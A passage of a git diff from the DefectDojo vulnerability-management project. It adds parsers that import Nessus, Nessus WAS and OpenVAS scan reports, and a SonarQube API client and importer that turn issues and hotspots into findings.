find.unsaved_vulnerability_ids.append(vulnerability_id) + + if fqdn and '://' in fqdn: + endpoint = Endpoint.from_uri(fqdn) + else: + if protocol == 'general': + endpoint = Endpoint(host=fqdn if fqdn else ip) + else: + endpoint = Endpoint(protocol=protocol, + host=fqdn if fqdn else ip, + port=port) + find.unsaved_endpoints.append(endpoint) + + return list(dupes.values()) + + def get_text_severity(self, severity_id): + """Convert data of the report into severity""" + if severity_id == 4: + return 'Critical' + elif severity_id == 3: + return 'High' + elif severity_id == 2: + return 'Medium' + elif severity_id == 1: + return 'Low' + else: + return 'Info' + + +class NessusParser(object): + + def get_scan_types(self): + return ["Nessus Scan"] + + def get_label_for_scan_types(self, scan_type): + return "Nessus Scan" + + def get_description_for_scan_types(self, scan_type): + return "Reports can be imported as CSV or .nessus (XML) report formats." + + def get_findings(self, filename, test): + + if filename.name.lower().endswith('.xml') or filename.name.lower().endswith('.nessus'): + return NessusXMLParser().get_findings(filename, test) + elif filename.name.lower().endswith('.csv'): + return NessusCSVParser().get_findings(filename, test) + else: + raise ValueError('Filename extension not recognized. Use .xml, .nessus or .csv') diff --git a/dojo/tools/nessus_was/__init__.py b/dojo/tools/nessus_was/__init__.py new file mode 100644 index 00000000000..e69de29bb2d diff --git a/dojo/tools/nessus_was/parser.py b/dojo/tools/nessus_was/parser.py new file mode 100644 index 00000000000..db1ee74afad --- /dev/null +++ b/dojo/tools/nessus_was/parser.py @@ -0,0 +1,226 @@ +import csv +import io +import logging +import re +import sys +from defusedxml import ElementTree +from dojo.models import Endpoint, Finding, Test + +LOGGER = logging.getLogger(__name__) + + +class NessusWASCSVParser(object): + + def _convert_severity(self, val): + if "None" == val: + return 'Info' + if val is None: + return 'Info' + else: + return val.title() + + def _format_cve(self, val): + if val is None: + return None + elif "" == val: + return None + cve_match = re.findall(r"CVE-[0-9]+-[0-9]+", val.upper(), re.IGNORECASE) + if cve_match: + return cve_match + return None + + def get_findings(self, filename, test: Test): + content = filename.read() + if type(content) is bytes: + content = content.decode('utf-8') + csv.field_size_limit(int(sys.maxsize / 10)) # the request/resp are big + reader = csv.DictReader(io.StringIO(content)) + dupes = dict() + for row in reader: + # get title, skip entries with empty titles + title = row.get('Name') + if not title: + continue + # get description, mitigation, impact etc. from respective columns + description = row.get('Synopsis') + mitigation = str(row.get('Solution')) + impact = row.get('Description') + references = row.get('See Also') + cvssv3 = row.get('CVSSv3', None) + protocol = row.get('Protocol').lower() if 'Protocol' in row else None + port = row.get('Port', None) + host = row.get('Host', row.get('IP Address', 'localhost')) + + # get severity from 'Risk' column and manage columns with no 'Risk' value + severity = self._convert_severity(row.get('Risk')) + if 'CVE' in row: + vulnerability_ids = self._format_cve(str(row.get('CVE'))) + else: + vulnerability_ids = None + + # manage multiple columns falling under one category (e.g. description being synopsis + plugin output) + dupe_key = severity + title + row.get('Host', 'No host') + str(row.get('Port', 'No port')) + row.get('Synopsis', 'No synopsis') + if dupe_key in dupes: + find = dupes[dupe_key] + if 'Plugin Output' in row: + find.description += row.get('Plugin Output') + else: + if 'Plugin Output' in row: + description = description + str(row.get('Plugin Output')) + find = Finding(title=title, + test=test, + description=description, + severity=severity, + mitigation=mitigation, + impact=impact, + references=references) + if cvssv3: + find.cvssv3_score = cvssv3 + if vulnerability_ids: + find.unsaved_vulnerability_ids = vulnerability_ids + find.unsaved_endpoints = list() + dupes[dupe_key] = find + # manage endpoints + if '://' in host: + endpoint = Endpoint.from_uri(host) + else: + endpoint = Endpoint( + protocol=protocol, + host=host, + port=port) + find.unsaved_endpoints.append(endpoint) + + return list(dupes.values()) + + +class NessusWASXMLParser(object): + def get_findings(self, file, test): + nscan = ElementTree.parse(file) + root = nscan.getroot() + + if 'NessusClientData_v2' not in root.tag: + raise ValueError('This version of Nessus report is not supported. Please make sure the export is ' + 'formatted using the NessusClientData_v2 schema.') + dupes = {} + for report in root.iter("Report"): + for host in report.iter("ReportHost"): + ip = host.attrib['name'] + fqdn = host.find(".//HostProperties/tag[@name='host-fqdn']").text if host.find( + ".//HostProperties/tag[@name='host-fqdn']") is not None else None + + for item in host.iter("ReportItem"): + port = None + if float(item.attrib["port"]) > 0: + port = item.attrib["port"] + + protocol = None + if str(item.attrib["svc_name"]): + protocol = re.sub(r'[^A-Za-z0-9\-\+]+', "", item.attrib["svc_name"]) + if protocol == 'www': + protocol = 'http' + + description = "" + plugin_output = None + if item.findtext("synopsis"): + description = item.find("synopsis").text + "\n\n" + if item.findtext("plugin_output"): + plugin_output = "Plugin Output: " + ip + ( + (":" + port) if port is not None else "") + \ + " \n```\n" + item.find("plugin_output").text + \ + "\n```\n\n" + description += plugin_output + + nessus_severity_id = int(item.attrib["severity"]) + severity = self.get_text_severity(nessus_severity_id) + + impact = "" + if item.findtext("description"): + impact = item.find("description").text + "\n\n" + if item.findtext("cvss"): + impact += "CVSS Score: " + item.find("cvss").text + "\n" + if item.findtext("cvssv3"): + impact += "CVSSv3 Score: " + item.find("cvssv3").text + "\n" + + mitigation = item.find("solution").text if item.find("solution") is not None else "N/A" + references = "" + for ref in item.iter("see_also"): + refs = ref.text.split() + for r in refs: + references += r + "\n" + + for xref in item.iter("xref"): + references += xref.text + "\n" + + vunerability_id = None + if item.findtext("cve"): + vunerability_id = item.find("cve").text + cwe = None + if item.findtext("cwe"): + cwe = item.find("cwe").text + title = item.attrib["pluginName"] + dupe_key = severity + title + + if dupe_key in dupes: + find = dupes[dupe_key] + if plugin_output is not None: + find.description += plugin_output + else: + find = Finding(title=title, + test=test, + description=description, + severity=severity, + mitigation=mitigation, + impact=impact, + references=references, + cwe=cwe) + if vunerability_id: + find.unsaved_vulnerability_ids = [vunerability_id] + find.unsaved_endpoints = list() + dupes[dupe_key] = find + + if '://' in fqdn: + endpoint = Endpoint.from_uri(fqdn) + else: + if protocol == 'general': + endpoint = Endpoint(host=fqdn if fqdn else ip) + else: + endpoint = Endpoint(protocol=protocol, + host=fqdn if fqdn else ip, + port=port) + find.unsaved_endpoints.append(endpoint) + + return list(dupes.values()) + + def get_text_severity(self, severity_id): + """Convert data of the report into severity""" + if severity_id == 4: + return 'Critical' + elif severity_id == 3: + return 'High' + elif severity_id == 2: + return 'Medium' + elif severity_id == 1: + return 'Low' + else: + return 'Info' + + +class NessusWASParser(object): + + def get_scan_types(self): + return ["Nessus WAS Scan"] + + def get_label_for_scan_types(self, scan_type): + return "Nessus WAS Scan" + + def get_description_for_scan_types(self, scan_type): + return "Reports can be imported as CSV or .nessus (XML) report formats." + + def get_findings(self, filename, test): + + if filename.name.lower().endswith('.xml') or filename.name.lower().endswith('.nessus'): + return NessusWASXMLParser().get_findings(filename, test) + elif filename.name.lower().endswith('.csv'): + return NessusWASCSVParser().get_findings(filename, test) + else: + raise ValueError('Filename extension not recognized. Use .xml, .nessus or .csv') diff --git a/dojo/tools/nmap/parser.py b/dojo/tools/nmap/parser.py old mode 100644 new mode 100755 diff --git a/dojo/tools/openvas_csv/__init__.py b/dojo/tools/openvas_csv/__init__.py new file mode 100644 index 00000000000..e69de29bb2d diff --git a/dojo/tools/openvas_csv/parser.py b/dojo/tools/openvas_csv/parser.py new file mode 100644 index 00000000000..8dd5cd0e35d --- /dev/null +++ b/dojo/tools/openvas_csv/parser.py @@ -0,0 +1,305 @@ + +import csv +import hashlib +import io + +from dateutil.parser import parse + +from dojo.models import Endpoint, Finding + + +class ColumnMappingStrategy(object): + + mapped_column = None + + def __init__(self): + self.successor = None + + def map_column_value(self, finding, column_value): + pass + + @staticmethod + def evaluate_bool_value(column_value): + if column_value.lower() == 'true': + return True + elif column_value.lower() == 'false': + return False + else: + return None + + def process_column(self, column_name, column_value, finding): + + if column_name.lower() == self.mapped_column and column_value is not None: + self.map_column_value(finding, column_value) + elif self.successor is not None: + self.successor.process_column(column_name, column_value, finding) + + +class DateColumnMappingStrategy(ColumnMappingStrategy): + + def __init__(self): + self.mapped_column = 'timestamp' + super(DateColumnMappingStrategy, self).__init__() + + def map_column_value(self, finding, column_value): + finding.date = parse(column_value).date() + + +class TitleColumnMappingStrategy(ColumnMappingStrategy): + + def __init__(self): + self.mapped_column = 'nvt name' + super(TitleColumnMappingStrategy, self).__init__() + + def map_column_value(self, finding, column_value): + finding.title = column_value + + +class CweColumnMappingStrategy(ColumnMappingStrategy): + + def __init__(self): + self.mapped_column = 'cweid' + super(CweColumnMappingStrategy, self).__init__() + + def map_column_value(self, finding, column_value): + if column_value.isdigit(): + finding.cwe = int(column_value) + + +class PortColumnMappingStrategy(ColumnMappingStrategy): + + def __init__(self): + self.mapped_column = 'port' + super(PortColumnMappingStrategy, self).__init__() + + def map_column_value(self, finding, column_value): + if column_value.isdigit(): + finding.unsaved_endpoints[0].port = int(column_value) + + +class ProtocolColumnMappingStrategy(ColumnMappingStrategy): + + def __init__(self): + self.mapped_column = 'port protocol' + super(ProtocolColumnMappingStrategy, self).__init__() + + def map_column_value(self, finding, column_value): + if column_value: # do not store empty protocol + finding.unsaved_endpoints[0].protocol = column_value + + +class IpColumnMappingStrategy(ColumnMappingStrategy): + + def __init__(self): + self.mapped_column = 'ip' + super(IpColumnMappingStrategy, self).__init__() + + def map_column_value(self, finding, column_value): + if not finding.unsaved_endpoints[0].host: # process only if host is not already defined (by field hostname) + finding.unsaved_endpoints[0].host = column_value + + +class HostnameColumnMappingStrategy(ColumnMappingStrategy): + + def __init__(self): + self.mapped_column = 'hostname' + super(HostnameColumnMappingStrategy, self).__init__() + + def map_column_value(self, finding, column_value): + if column_value: # do not override IP if hostname is empty + finding.unsaved_endpoints[0].host = column_value + + +class SeverityColumnMappingStrategy(ColumnMappingStrategy): + + @staticmethod + def is_valid_severity(severity): + valid_severity = ('Info', 'Low', 'Medium', 'High', 'Critical') + return severity in valid_severity + + def __init__(self): + self.mapped_column = 'severity' + super(SeverityColumnMappingStrategy, self).__init__() + + def map_column_value(self, finding, column_value): + if self.is_valid_severity(column_value): + finding.severity = column_value + else: + finding.severity = 'Info' + + +class DescriptionColumnMappingStrategy(ColumnMappingStrategy): + + def __init__(self): + self.mapped_column = 'summary' + super(DescriptionColumnMappingStrategy, self).__init__() + + def map_column_value(self, finding, column_value): + finding.description = column_value + + +class MitigationColumnMappingStrategy(ColumnMappingStrategy): + + def __init__(self): + self.mapped_column = 'solution' + super(MitigationColumnMappingStrategy, self).__init__() + + def map_column_value(self, finding, column_value): + finding.mitigation = column_value + + +class ImpactColumnMappingStrategy(ColumnMappingStrategy): + + def __init__(self): + self.mapped_column = 'vulnerability insight' + super(ImpactColumnMappingStrategy, self).__init__() + + def map_column_value(self, finding, column_value): + finding.impact = column_value + + +class ReferencesColumnMappingStrategy(ColumnMappingStrategy): + + def __init__(self): + self.mapped_column = 'specific result' + super(ReferencesColumnMappingStrategy, self).__init__() + + def map_column_value(self, finding, column_value): + finding.references = column_value + + +class ActiveColumnMappingStrategy(ColumnMappingStrategy): + + def __init__(self): + self.mapped_column = 'active' + super(ActiveColumnMappingStrategy, self).__init__() + + def map_column_value(self, finding, column_value): + finding.active = self.evaluate_bool_value(column_value) + + +class VerifiedColumnMappingStrategy(ColumnMappingStrategy): + + def __init__(self): + self.mapped_column = 'verified' + super(VerifiedColumnMappingStrategy, self).__init__() + + def map_column_value(self, finding, column_value): + finding.verified = self.evaluate_bool_value(column_value) + + +class FalsePositiveColumnMappingStrategy(ColumnMappingStrategy): + + def __init__(self): + self.mapped_column = 'falsepositive' + super(FalsePositiveColumnMappingStrategy, self).__init__() + + def map_column_value(self, finding, column_value): + finding.false_p = self.evaluate_bool_value(column_value) + + +class DuplicateColumnMappingStrategy(ColumnMappingStrategy): + + def __init__(self): + self.mapped_column = 'duplicate' + super(DuplicateColumnMappingStrategy, self).__init__() + + def map_column_value(self, finding, column_value): + finding.duplicate = self.evaluate_bool_value(column_value) + + +class OpenVASCsvParser(object): + + def create_chain(self): + date_column_strategy = DateColumnMappingStrategy() + title_column_strategy = TitleColumnMappingStrategy() + cwe_column_strategy = CweColumnMappingStrategy() + ip_column_strategy = IpColumnMappingStrategy() + hostname_column_strategy = HostnameColumnMappingStrategy() + severity_column_strategy = SeverityColumnMappingStrategy() + description_column_strategy = DescriptionColumnMappingStrategy() + mitigation_column_strategy = MitigationColumnMappingStrategy() + impact_column_strategy = ImpactColumnMappingStrategy() + references_column_strategy = ReferencesColumnMappingStrategy() + active_column_strategy = ActiveColumnMappingStrategy() + verified_column_strategy = VerifiedColumnMappingStrategy() + false_positive_strategy = FalsePositiveColumnMappingStrategy() + duplicate_strategy = DuplicateColumnMappingStrategy() + port_strategy = PortColumnMappingStrategy() + protocol_strategy = ProtocolColumnMappingStrategy() + + port_strategy.successor = protocol_strategy + duplicate_strategy.successor = port_strategy + false_positive_strategy.successor = duplicate_strategy + verified_column_strategy.successor = false_positive_strategy + active_column_strategy.successor = verified_column_strategy + references_column_strategy.successor = active_column_strategy + impact_column_strategy.successor = references_column_strategy + mitigation_column_strategy.successor = impact_column_strategy + description_column_strategy.successor = mitigation_column_strategy + severity_column_strategy.successor = description_column_strategy + ip_column_strategy.successor = severity_column_strategy + hostname_column_strategy.successor = ip_column_strategy + cwe_column_strategy.successor = hostname_column_strategy + title_column_strategy.successor = cwe_column_strategy + date_column_strategy.successor = title_column_strategy + + return date_column_strategy + + def read_column_names(self, row): + column_names = dict() + index = 0 + for column in row: + column_names[index] = column + index += 1 + return column_names + + def get_scan_types(self): + return ["OpenVAS CSV"] + + def get_label_for_scan_types(self, scan_type): + return scan_type # no custom label for now + + def get_description_for_scan_types(self, scan_type): + return "Import OpenVAS Scan in CSV format. Export as CSV Results on OpenVAS." + + def get_findings(self, filename, test): + + column_names = dict() + dupes = dict() + chain = self.create_chain() + + content = filename.read() + if type(content) is bytes: + content = content.decode('utf-8') + reader = csv.reader(io.StringIO(content), delimiter=',', quotechar='"') + + row_number = 0 + for row in reader: + finding = Finding(test=test) + finding.unsaved_endpoints = [Endpoint()] + + if row_number == 0: + column_names = self.read_column_names(row) + row_number += 1 + continue + + column_number = 0 + for column in row: + chain.process_column(column_names[column_number], column, finding) + column_number += 1 + + if finding is not None and row_number > 0: + if finding.title is None: + finding.title = "" + if finding.description is None: + finding.description = "" + + key = hashlib.sha256((str(finding.unsaved_endpoints[0]) + '|' + finding.severity + '|' + finding.title + '|' + finding.description).encode('utf-8')).hexdigest() + + if key not in dupes: + dupes[key] = finding + + row_number += 1 + + return list(dupes.values()) diff --git a/dojo/tools/php_security_audit_v2/__init__.py b/dojo/tools/php_security_audit_v2/__init__.py old mode 100644 new mode 100755 diff --git a/dojo/tools/snyk/__init__.py b/dojo/tools/snyk/__init__.py old mode 100644 new mode 100755 diff --git a/dojo/tools/snyk/parser.py b/dojo/tools/snyk/parser.py old mode 100644 new mode 100755 diff --git a/dojo/tools/sonarqube_api/__init__.py b/dojo/tools/sonarqube_api/__init__.py new file mode 100644 index 00000000000..e69de29bb2d diff --git a/dojo/tools/sonarqube_api/api_client.py b/dojo/tools/sonarqube_api/api_client.py new file mode 100644 index 00000000000..c5ae1a890d9 --- /dev/null +++ b/dojo/tools/sonarqube_api/api_client.py @@ -0,0 +1,367 @@ +import requests + +from dojo.models import Tool_Configuration, Tool_Type +from dojo.utils import prepare_for_view + + +class SonarQubeAPI: + + def __init__(self, tool_config=None): + + self.rules_cache = dict() + + tool_type, _ = Tool_Type.objects.get_or_create(name='SonarQube') + + if not tool_config: # https://github.com/DefectDojo/django-DefectDojo/pull/4676 cases no. 1-3 + try: + tool_config = Tool_Configuration.objects.get(tool_type=tool_type) # https://github.com/DefectDojo/django-DefectDojo/pull/4676 case no. 2 + except Tool_Configuration.DoesNotExist: # https://github.com/DefectDojo/django-DefectDojo/pull/4676 case no. 1 + raise Exception( + 'No SonarQube tool is configured. \n' + 'Create a new Tool at Settings -> Tool Configuration' + ) + except Tool_Configuration.MultipleObjectsReturned: # https://github.com/DefectDojo/django-DefectDojo/pull/4676 case no. 3 + raise Exception( + 'More than one Tool Configuration for SonarQube exists. \n' + 'Please specify at Product configuration which one should be used.' + ) + self.extras = tool_config.extras + self.session = requests.Session() + self.sonar_api_url = tool_config.url + if tool_config.authentication_type == "Password": + self.session.auth = (tool_config.username, prepare_for_view(tool_config.password)) + elif tool_config.authentication_type == "API": + self.session.auth = (tool_config.api_key, '') + else: + raise Exception('SonarQube Authentication type {} not supported'.format(tool_config.authentication_type)) + + def find_project(self, project_name): + """ + Search for projects by name. + :param project_name: + :return: + """ + response = self.session.get( + url='{}/components/search'.format(self.sonar_api_url), + params={ + 'q': project_name, + 'qualifiers': 'TRK' + }, + headers={ + 'User-Agent': 'DefectDojo' + }, + ) + + if response.ok: + for component in response.json().get('components', []): + if component['name'] == project_name: + return component + raise Exception( + 'Expected Project "{}", but it returned {}. \n' + 'Project Name is case sensitive and must match the DefectDojo Product Name. \n' + 'Alternatively it can also be specified the Project Key at Product configuration.'.format( + project_name, + [x.get('name') for x in response.json().get('components')] + ) + ) + + else: + raise Exception("Unable to find the project {} due to {} - {}".format( + project_name, response.status_code, response.content.decode("utf-8") + )) + + def get_project(self, project_key): + """ + Returns a component (project). + Requires the following permission: 'Browse' on the project of the specified component. + :param project_key: + :return: + """ + response = self.session.get( + url='{}/components/show'.format(self.sonar_api_url), + params={ + 'component': project_key, + }, + headers={ + 'User-Agent': 'DefectDojo' + }, + ) + + if response.ok: + return response.json().get('component') + else: + raise Exception("Unable to find the project {} due to {} - {}".format( + project_key, response.status_code, response.content.decode("utf-8") + )) + + def find_issues(self, component_key, types='VULNERABILITY'): + """ + Search for issues. + At most one of the following parameters can be provided at the same time: + componentKeys, componentUuids, components, componentRootUuids, componentRoots. + Requires the 'Browse' permission on the specified project(s). + :param component_key: component key + :param types: issue types (comma separated values). e.g. BUG,VULNERABILITY,CODE_SMELL + :return: + """ + + if self.extras is not None: + types = self.extras + + page = 1 + max_page = 100 + issues = list() + + while page <= max_page: + request_filter = { + 'componentKeys': component_key, + 'types': types, + 'p': page + } + response = self.session.get( + url='{}/issues/search'.format(self.sonar_api_url), + params=request_filter, + headers={ + 'User-Agent': 'DefectDojo' + }, + ) + + if response.ok: + issues_page = response.json().get('issues') + if not issues_page: + break + issues.extend(issues_page) + page += 1 + + else: + raise Exception( + "Unable to find the issues for component {} due to {} - {}".format( + component_key, response.status_code, response.content.decode("utf-8") + ) + ) + + return issues + + def find_hotspots(self, project_key): + """ + Search for hotspots. + :param project_key: project key + :return: + """ + page = 1 + max_page = 100 + hotspots = list() + + while page <= max_page: + request_filter = { + 'projectKey': project_key, + 'p': page + } + response = self.session.get( + url='{}/hotspots/search'.format(self.sonar_api_url), + params=request_filter, + headers={ + 'User-Agent': 'DefectDojo' + }, + ) + + if response.ok: + hotspots_page = response.json().get('hotspots') + if not hotspots_page: + break + hotspots.extend(hotspots_page) + page += 1 + + else: + raise Exception( + "Unable to find the hotspots for project {} due to {} - {}".format( + project_key, response.status_code, response.content + ) + ) + + return hotspots + + def get_issue(self, issue_key): + """ + Search for issues. + At most one of the following parameters can be provided at the same time: + componentKeys, componentUuids, components, componentRootUuids, componentRoots. + Requires the 'Browse' permission on the specified project(s). + :param issue_key: + :return: + """ + request_filter = { + 'issues': issue_key, + 'types': 'BUG,VULNERABILITY,CODE_SMELL' + } + response = self.session.get( + url='{}/issues/search'.format(self.sonar_api_url), + params=request_filter, + headers={ + 'User-Agent': 'DefectDojo' + }, + ) + + if response.ok: + issues = response.json().get('issues', []) + if issues: + for issue in response.json().get('issues', []): + if issue['key'] == issue_key: + return issue + raise Exception( + 'Expected Issue "{}", but it returned {}.'.format( + issue_key, + [x.get('key') for x in response.json().get('issues')] + ) + ) + else: + raise Exception( + "Unable to get issue {} due to {} - {}".format( + issue_key, response.status_code, response.content.decode("utf-8") + ) + ) + + def get_rule(self, rule_id): + """ + Get detailed information about a rule + :param rule_id: + :return: + """ + rule = self.rules_cache.get(rule_id) + if not rule: + response = self.session.get( + url='{}/rules/show'.format(self.sonar_api_url), + params={'key': rule_id}, + headers={ + 'User-Agent': 'DefectDojo' + }, + ) + if response.ok: + rule = response.json()['rule'] + self.rules_cache.update({rule_id: rule}) + else: + raise Exception("Unable to get the rule {} due to {} - {}".format( + rule_id, response.status_code, response.content.decode("utf-8") + )) + return rule + + def get_hotspot_rule(self, rule_id): + """ + Get detailed information about a hotspot + :param rule_id: + :return: + """ + rule = self.rules_cache.get(rule_id) + if not rule: + response = self.session.get( + url='{}/hotspots/show'.format(self.sonar_api_url), + params={'hotspot': rule_id}, + headers={ + 'User-Agent': 'DefectDojo' + }, + ) + if response.ok: + rule = response.json()['rule'] + self.rules_cache.update({rule_id: rule}) + else: + raise Exception("Unable to get the hotspot rule {} due to {} - {}".format( + rule_id, response.status_code, response.content + )) + return rule + + def transition_issue(self, issue_key, transition): + """ + Do workflow transition on an issue. Requires authentication and Browse permission on project. + The transitions 'wontfix' and 'falsepositive' require the permission 'Administer Issues'. + The transitions involving security hotspots (except 'requestreview') require + the permission 'Administer Security Hotspot'. + + Possible transitions: + - confirm + - unconfirm + - reopen + - resolve + - falsepositive + - wontfix + - close + - detect + - dismiss + - reject + - requestreview + - accept + - clear + - reopenhotspot + + :param issue_key: + :param transition: + :return: + """ + response = self.session.post( + url='{}/issues/do_transition'.format(self.sonar_api_url), + data={ + 'issue': issue_key, + 'transition': transition + }, + headers={ + 'User-Agent': 'DefectDojo' + }, + ) + if not response.ok: + raise Exception( + "Unable to transition {} the issue {} due to {} - {}".format( + transition, issue_key, response.status_code, response.content.decode("utf-8") + ) + ) + + def add_comment(self, issue_key, text): + """ + Add a comment. + Requires authentication and the following permission: 'Browse' on the project of the specified issue. + :param issue_key: + :param text: + :return: + """ + response = self.session.post( + url='{}/issues/add_comment'.format(self.sonar_api_url), + data={ + 'issue': issue_key, + 'text': text + }, + headers={ + 'User-Agent': 'DefectDojo' + }, + ) + if not response.ok: + raise Exception( + "Unable to add a comment into issue {} due to {} - {}".format( + issue_key, response.status_code, response.content.decode("utf-8") + ) + ) + + def test_connection(self): + """ + Returns number of components (projects) or raise error. + """ + response = self.session.get( + url='{}/components/search'.format(self.sonar_api_url), + params={ + 'qualifiers': 'TRK' + }, + headers={ + 'User-Agent': 'DefectDojo' + }, + ) + + if response.ok: + num_projects = response.json()['paging']['total'] + return f'You have access to {num_projects} projects' + + else: + raise Exception("Unable to connect and search in SonarQube due to {} - {}".format( + response.status_code, response.content.decode("utf-8") + )) + + def test_product_connection(self, api_scan_configuration): + project = self.get_project(api_scan_configuration.service_key_1) + project_name = project.get('name') + return f'You have access to project {project_name}' diff --git a/dojo/tools/sonarqube_api/importer.py b/dojo/tools/sonarqube_api/importer.py new file mode 100644 index 00000000000..fdd548bf4ab --- /dev/null +++ b/dojo/tools/sonarqube_api/importer.py @@ -0,0 +1,290 @@ +import logging +import re + +import html2text +from lxml import etree +import textwrap +from django.conf import settings +from django.core.exceptions import ValidationError + +from dojo.models import Finding, Sonarqube_Issue +from dojo.notifications.helper import create_notification +from dojo.tools.sonarqube_api.api_client import SonarQubeAPI + +logger = logging.getLogger(__name__) + + +class SonarQubeApiImporter(object): + """ + This class imports from SonarQube (SQ) all open/confirmed SQ issues related to the project related to the test as + findings. + """ + + def get_findings(self, filename, test): + items = self.import_issues(test) + if settings.SONARQUBE_API_PARSER_HOTSPOTS: + items.extend(self.import_hotspots(test)) + return items + + @staticmethod + def is_confirmed(state): + return state.lower() in [ + 'confirmed', + 'accepted', + 'detected', + ] + + @staticmethod + def is_closed(state): + return state.lower() in [ + 'resolved', + 'falsepositive', + 'wontfix', + 'closed', + 'dismissed', + 'rejected' + ] + + @staticmethod + def is_reviewed(state): + return state.lower() in [ + 'reviewed' + ] + + @staticmethod + def prepare_client(test): + product = test.engagement.product + if test.api_scan_configuration: + config = test.api_scan_configuration # https://github.com/DefectDojo/django-DefectDojo/pull/4676 case no. 7 and 8 + # Double check of config + if config.product != product: + raise ValidationError('Product API Scan Configuration and Product do not match.') + else: + sqqs = product.product_api_scan_configuration_set.filter(product=product, tool_configuration__tool_type__name='SonarQube') + if sqqs.count() == 1: # https://github.com/DefectDojo/django-DefectDojo/pull/4676 case no. 4 + config = sqqs.first() + elif sqqs.count() > 1: # https://github.com/DefectDojo/django-DefectDojo/pull/4676 case no. 6 + raise ValidationError( + 'More than one Product API Scan Configuration has been configured, but none of them has been chosen. Please specify which one should be used.' + ) + else: # https://github.com/DefectDojo/django-DefectDojo/pull/4676 cases no. 1-3 + config = None + + return SonarQubeAPI(tool_config=config.tool_configuration if config else None), config + + def import_issues(self, test): + + items = list() + + try: + + client, config = self.prepare_client(test) + + if config and config.service_key_1: # https://github.com/DefectDojo/django-DefectDojo/pull/4676 cases no. 5 and 8 + component = client.get_project(config.service_key_1) + else: # https://github.com/DefectDojo/django-DefectDojo/pull/4676 cases no. 2, 4 and 7 + component = client.find_project(test.engagement.product.name) + + issues = client.find_issues(component['key']) + logging.info('Found {} issues for component {}'.format(len(issues), component["key"])) + + for issue in issues: + status = issue['status'] + from_hotspot = issue.get('fromHotspot', False) + + if self.is_closed(status) or from_hotspot: + continue + + type = issue['type'] + if len(issue['message']) > 511: + title = issue['message'][0:507] + "..." + else: + title = issue['message'] + component_key = issue['component'] + line = issue.get('line') + rule_id = issue['rule'] + rule = client.get_rule(rule_id) + severity = self.convert_sonar_severity(issue['severity']) + # custom (user defined) SQ rules may not have 'htmlDesc' + if 'htmlDesc' in rule: + description = self.clean_rule_description_html(rule['htmlDesc']) + cwe = self.clean_cwe(rule['htmlDesc']) + references = self.get_references(rule['htmlDesc']) + else: + description = "" + cwe = None + references = "" + + sonarqube_issue, _ = Sonarqube_Issue.objects.update_or_create( + key=issue['key'], + defaults={ + 'status': status, + 'type': type, + } + ) + + # Only assign the SonarQube_issue to the first finding related to the issue + if Finding.objects.filter(sonarqube_issue=sonarqube_issue).exists(): + sonarqube_issue = None + + find = Finding( + title=title, + cwe=cwe, + description=description, + test=test, + severity=severity, + references=references, + file_path=component_key, + line=line, + verified=self.is_confirmed(status), + false_p=False, + duplicate=False, + out_of_scope=False, + mitigated=None, + mitigation='No mitigation provided', + impact="No impact provided", + static_finding=True, + sonarqube_issue=sonarqube_issue, + unique_id_from_tool=issue.get('key'), + ) + items.append(find) + + except Exception as e: + logger.exception(e) + create_notification( + event='other', + title='SonarQube API import issue', + description=e, + icon='exclamation-triangle', + source='SonarQube API', + obj=test.engagement.product + ) + + return items + + def import_hotspots(self, test): + try: + items = list() + client, config = self.prepare_client(test) + + if config and config.service_key_1: # https://github.com/DefectDojo/django-DefectDojo/pull/4676 cases no. 5 and 8 + component = client.get_project(config.service_key_1) + else: # https://github.com/DefectDojo/django-DefectDojo/pull/4676 cases no. 2, 4 and 7 + component = client.find_project(test.engagement.product.name) + + hotspots = client.find_hotspots(component['key']) + logging.info('Found {} hotspots for project {}'.format(len(hotspots), component["key"])) + + for hotspot in hotspots: + status = hotspot['status'] + + if self.is_reviewed(status): + continue + + type = 'SECURITY_HOTSPOT' + severity = 'Info' + title = textwrap.shorten(text=hotspot.get('message', ''), width=500) + component_key = hotspot.get('component') + line = hotspot.get('line') + rule_id = hotspot.get('key', '') + rule = client.get_hotspot_rule(rule_id) + scanner_confidence = self.convert_scanner_confidence(hotspot.get('vulnerabilityProbability', '')) + description = self.clean_rule_description_html(rule.get('vulnerabilityDescription', 'No description provided.')) + cwe = self.clean_cwe(rule.get('fixRecommendations', '')) + references = self.get_references(rule.get('riskDescription', '')) + self.get_references(rule.get('fixRecommendations', '')) + + sonarqube_issue, _ = Sonarqube_Issue.objects.update_or_create( + key=hotspot['key'], + defaults={ + 'status': status, + 'type': type + } + ) + + # Only assign the SonarQube_issue to the first finding related to the issue + if Finding.objects.filter(sonarqube_issue=sonarqube_issue).exists(): + sonarqube_issue = None + + find = Finding( + title=title, + cwe=cwe, + description=description, + test=test, + severity=severity, + references=references, + file_path=component_key, + line=line, + active=True, + verified=self.is_confirmed(status), + false_p=False, + duplicate=False, + out_of_scope=False, + static_finding=True, + scanner_confidence=scanner_confidence, + sonarqube_issue=sonarqube_issue, + unique_id_from_tool=f"hotspot:{hotspot.get('key')}", + ) + items.append(find) + + return items + + except Exception as e: + logger.exception(e) + create_notification( + event='other', + title='SonarQube API import issue', + description=e, + icon='exclamation-triangle', + source='SonarQube API', + obj=test.engagement.product + ) + + @staticmethod + def clean_rule_description_html(raw_html): + search = re.search(r"^(.*?)(?:(

    See

    )|(References))", raw_html, re.DOTALL) + if search: + raw_html = search.group(1) + h = html2text.HTML2Text() + raw_html = raw_html.replace('

    ', '').replace('

    ', '') + return h.handle(raw_html) + + @staticmethod + def clean_cwe(raw_html): + search = re.search(r'CWE-(\d+)', raw_html) + if search: + return int(search.group(1)) + + @staticmethod + def convert_sonar_severity(sonar_severity): + sev = sonar_severity.lower() + if sev == "blocker": + return "Critical" + elif sev == "critical": + return "High" + elif sev == "major": + return "Medium" + elif sev == "minor": + return "Low" + else: + return "Info" + + @staticmethod + def convert_scanner_confidence(sonar_scanner_confidence): + sev = sonar_scanner_confidence.lower() + if sev == "high": + return 1 + elif sev == "medium": + return 4 + elif sev == "low": + return 7 + else: + return 7 + + @staticmethod + def get_references(vuln_details): + parser = etree.HTMLParser() + details = etree.fromstring(vuln_details, parser) + rule_references = "" + for a in details.iter("a"): + rule_references += "[{}]({})\n".format(a.text, a.get('href')) + return rule_references diff --git a/dojo/tools/sonarqube_api/parser.py b/dojo/tools/sonarqube_api/parser.py new file mode 100644 index 00000000000..2297773493d --- /dev/null +++ b/dojo/tools/sonarqube_api/parser.py @@ -0,0 +1,25 @@ +from .importer import SonarQubeApiImporter + + +SCAN_SONARQUBE_API = 'SonarQube API Import' + + +class SonarQubeAPIParser(object): + + def get_scan_types(self): + return 